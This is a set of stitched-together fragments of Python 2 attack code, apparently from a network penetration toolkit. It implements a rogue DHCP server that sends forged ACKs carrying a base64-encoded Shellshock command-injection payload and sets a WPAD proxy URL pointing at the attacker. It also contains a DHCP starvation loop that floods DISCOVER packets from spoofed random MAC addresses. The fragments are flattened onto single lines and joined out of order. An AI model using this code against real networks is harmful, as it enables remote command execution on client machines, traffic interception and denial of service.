payload = b64encode(payload) shellshock_url = "() { :" + "; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")" if shellshock_url is not None: if len(shellshock_url) > 255: print "[ERROR] Len of command is very big! Current len: " + str(len(shellshock_url)) shellshock_url = "A" global proxy if args.proxy is None: proxy = bytes("http://" + dhcp_server_ip_address + ":8080/wpad.dat") else: proxy = bytes(args.proxy) ack_packet = make_dhcp_ack_packet(transaction_id, requested_ip) sendp(ack_packet, iface=current_network_interface, verbose=False) print "[INFO] Send ack response!" if __name__ == "__main__": if args.target_mac is None: print "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM ..." sniff(lfilter=lambda d: d.src != eth.get_mac_for_dhcp_discover() and d.src != Base.get_netiface_mac_address(current_network_interface), filter="udp and src port 68 and dst port 67 and dst host 255.255.255.255", prn=dhcp_reply, iface=current_network_interface) else: print "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac + " ..." sniff(lfilter=lambda d: d.src == args.target_mac, filter="udp and src port 68 and dst port 67", prn=dhcp_reply, iface=current_network_interface)
count_percent = 0 print "Creating packets..." if args.notspoofmac: print " Your MAC address is not spoofed!" eth = Ethernet_raw() dhcp = DHCP_raw() while count < count_max: if args.notspoofmac: SRC_MAC = current_mac_address else: SRC_MAC = eth.get_mac_for_dhcp_discover() CLIENT_MAC = eth.get_random_mac() HOST_NAME = Base.make_random_string(8) current_packet = dhcp.make_discover_packet(SRC_MAC, CLIENT_MAC, HOST_NAME) PACKETS.append(current_packet) count += 1 if count > count_percent: stdout.flush() stdout.write(" Complete: " + str(index_percent + 1) + "% \r") index_percent += 1 count_percent = (count_max / 100) * index_percent
if __name__ == "__main__": if args.target_ip is not None: if args.target_mac is None: print Base.c_error + "Please set target MAC address (--target_mac 00:AA:BB:CC:DD:FF)" exit(1) else: print Base.c_info + "Waiting for ARP, DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac sniff(lfilter=lambda d: d.src == args.target_mac, filter="arp or (udp and src port 68 and dst port 67)", prn=dhcp_reply, iface=current_network_interface) else: if args.target_mac is None: print Base.c_info + "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM" sniff( lfilter=lambda d: d.src != eth.get_mac_for_dhcp_discover( ) and d.src != Base.get_netiface_mac_address( current_network_interface), filter= "udp and src port 68 and dst port 67 and dst host 255.255.255.255", prn=dhcp_reply, iface=current_network_interface) else: print Base.c_info + "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac sniff(lfilter=lambda d: d.src == args.target_mac, filter="udp and src port 68 and dst port 67", prn=dhcp_reply, iface=current_network_interface)